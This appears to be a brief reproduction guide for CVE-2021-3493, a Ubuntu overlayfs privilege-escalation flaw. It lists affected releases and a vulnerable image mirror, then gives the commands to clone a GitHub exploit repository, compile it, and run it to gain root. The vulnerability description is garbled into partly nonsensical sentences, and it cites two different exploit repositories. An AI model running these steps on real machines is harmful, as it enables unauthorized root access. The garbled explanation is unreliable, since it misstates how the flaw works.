CVE-2021-3493 Linux Privilege Escalation Kernel Vulnerability
Vulnerability description
The CVE-2021-3493 user vulnerability is an Ubuntu over specific issue in layfs in a filesystem not present in the Linux kernel, correctly validating applications on namespace filesystems in Ubuntu. The Ubuntu kernel code allows low-privileged users to mount overlayfs filesystems in user namespaces created with the unshare() function. When using the setxattr() function to set the security.capablility extended attribute of the file in the merged joint mount directory, according to the characteristics of the overlayfs file system, the extended attribute of the corresponding file in the upper directory under init_user_ns will actually be modified, resulting in local privilege escalation problems
Vulnerability impact
- Ubuntu 20.10
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
- Ubuntu 16.04 LTS
- Ubuntu 14.04 ESM (Linux kernel version < 5.11)
Vulnerability recurrence
The download address of the image system with this vulnerability:http://mirrors.ustc.edu.cn/ubuntu-releases/16.04/
EXP download address:https://github.com/briskets/CVE-2021-3493
Execute the following code for privilege escalation
git clone https://github.com/inspiringz/CVE-2021-3493.git
gcc exploit.c -o exploit
chmod +x exploit
./exploit whoami
As shown in the figure, the privilege escalation is successful